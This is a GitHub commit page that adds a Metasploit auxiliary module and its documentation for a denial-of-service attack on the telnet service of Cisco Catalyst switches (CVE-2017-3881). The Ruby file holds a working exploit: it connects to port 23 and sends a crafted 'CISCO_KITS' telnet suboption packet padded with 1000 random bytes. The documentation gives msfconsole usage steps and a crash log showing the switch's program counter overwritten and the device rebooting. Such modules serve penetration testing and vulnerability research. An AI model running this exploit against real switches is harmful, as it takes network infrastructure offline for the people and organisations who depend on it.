Skip to content

Commit 40f0d36

Browse files
author
Brent Cook
committed
Land rapid7#8615, add @artkond's DoS module for Cisco CVE-2017-3881 
2 parents 819d810 + 0d9f57a commit 40f0d36

File tree

2 files changed

+212
-0
lines changed

2 files changed

+212
-0
lines changed

documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md

Lines changed: 161 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,161 @@
1+
## Vulnerable Application
2+
3+
1. Obtain or target two paired Cisco Catalyst switches of any model indicated here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp.
4+
2. They will need to be configured in cluster mode. Additional information on setup is available from the module author's site here: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
5+
6+
## Verification Steps
7+
8+
1. Start msfconsole
9+
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
10+
3. Do: `set RHOST 192.168.1.10`
11+
4. Do: ```run```
12+
5. The switch should restart and display crash information on the console.
13+
14+
## Scenarios
15+
16+
```
17+
Switch#sh ver
18+
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
19+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
20+
Technical Support: http://www.cisco.com/techsupport
21+
Copyright (c) 1986-2010 by Cisco Systems, Inc.
22+
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
23+
Image text-base: 0x01000000, data-base: 0x02C00000
24+
ROM: Bootstrap program is C3750 boot loader
25+
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
26+
Switch uptime is 1 hour, 28 minutes
27+
System returned to ROM by power-on
28+
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
29+
[...]
30+
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
31+
Processor board ID CAT1017Z2Z2
32+
Last reset from power-on
33+
1 Virtual Ethernet interface
34+
48 FastEthernet interfaces
35+
4 Gigabit Ethernet interfaces
36+
The password-recovery mechanism is enabled.
37+
[...]
38+
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
39+
Technical Support: http://www.cisco.com/techsupport
40+
Copyright (c) 1986-2015 by Cisco Systems, Inc.
41+
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
42+
Image text-base: 0x01000000, data-base: 0x02F00000
43+
[...]
44+
Election Complete
45+
Switch 2 booting as Master
46+
Waiting for Port download...Complete
47+
[...]
48+
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
49+
Processor board ID CAT1017Z2Z2
50+
Last reset from power-on
51+
1 Virtual Ethernet interface
52+
48 FastEthernet interfaces
53+
4 Gigabit Ethernet interfaces
54+
The password-recovery mechanism is enabled.
55+
[...]
56+
Switch Ports Model SW Version SW Image
57+
------ ----- ----- ---------- ----------
58+
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
59+
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
60+
Switch#
61+
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
62+
-Traceback= 41414140
63+
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
64+
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
65+
Buffered messages:
66+
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
67+
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
68+
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
69+
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
70+
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
71+
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
72+
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
73+
00:00:50: %SYS-5-RESTART: System restarted --
74+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
75+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
76+
Compiled Fri 20-Jul-07 01:58 by nachen
77+
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
78+
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
79+
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
80+
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
81+
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
82+
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
83+
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
84+
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
85+
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
86+
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
87+
Queued messages:
88+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
89+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
90+
Compiled Fri 20-Jul-07 01:58 by nachen
91+
Instruction Access Exception (0x0400)!
92+
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
93+
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
94+
CPU Register Context:
95+
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
96+
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
97+
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
98+
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
99+
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
100+
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
101+
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
102+
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
103+
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
104+
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
105+
Stack trace:
106+
PC = 0x41414140, SP = 0x02DDEE80
107+
Frame 00: SP = 0x41414141 PC = 0x41414141
108+
Switch uptime is 37 minutes, 22 seconds
109+
[... rebooting ... ]
110+
Switch Ports Model SW Version SW Image
111+
------ ----- ----- ---------- ----------
112+
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
113+
Failed to generate persistent self-signed certificate.
114+
Secure server will use temporary self-signed certificate.
115+
Press RETURN to get started!
116+
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
117+
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
118+
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
119+
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
120+
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
121+
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
122+
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
123+
Switch>
124+
Switch>as changed to state DOWN
125+
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
126+
00:00:32: %SYS-5-RESTART: System restarted --
127+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
128+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
129+
Compiled Fri 20-Jul-07 01:58 by nachen
130+
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
131+
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
132+
Switch>
133+
Switch>
134+
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
135+
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
136+
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
137+
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
138+
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
139+
00:01:32: %PLATFORM-1-CRASHED:
140+
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
141+
00:01:32: %PLATFORM-1-CRASHED:
142+
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
143+
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
144+
00:01:32: %PLATFORM-1-CRASHED:
145+
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
146+
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
147+
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
148+
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
149+
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
150+
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
151+
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
152+
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
153+
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
154+
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
155+
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
156+
00:01:32: %PLATFORM-1-CRASHED:
157+
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
158+
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
159+
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
160+
00:01:32: %PLATFORM-1-CRASHED:
161+
```

modules/auxiliary/dos/cisco/ios_telnet_rocem.rb

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
class MetasploitModule < Msf::Auxiliary
7+
include Msf::Exploit::Remote::Tcp
8+
include Msf::Auxiliary::Dos
9+
10+
def initialize(info = {})
11+
super(update_info(info,
12+
'Name' => 'Cisco IOS Telnet Denial of Service',
13+
'Description' => %q{
14+
This module triggers a Denial of Service condition in the Cisco IOS
15+
telnet service affecting multiple Cisco switches. Tested against Cisco
16+
Catalyst 2960 and 3750.
17+
},
18+
'Author' => [ 'Artem Kondratenko' ],
19+
'License' => MSF_LICENSE,
20+
'References' =>
21+
[
22+
['BID', '96960'],
23+
['CVE', '2017-3881'],
24+
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],
25+
['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']
26+
],
27+
'DisclosureDate' => 'Mar 17 2017'))
28+
29+
register_options([ Opt::RPORT(23) ])
30+
end
31+
32+
def run
33+
begin
34+
connect
35+
print_status "Connected to telnet service"
36+
packet = sock.read(200)
37+
if packet.nil?
38+
print_status "Failed to get initial packet from telnet service."
39+
else
40+
print_status "Got initial packet from telnet service: " + packet.inspect
41+
end
42+
print_status "Sending Telnet DoS packet"
43+
sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
44+
disconnect
45+
rescue ::Rex::ConnectionRefused
46+
print_status "Unable to connect to #{rhost}:#{rport}."
47+
rescue ::Errno::ECONNRESET
48+
print_good "DoS packet successful. #{rhost} not responding."
49+
end
50+
end
51+
end

0 commit comments

Comments
 (0)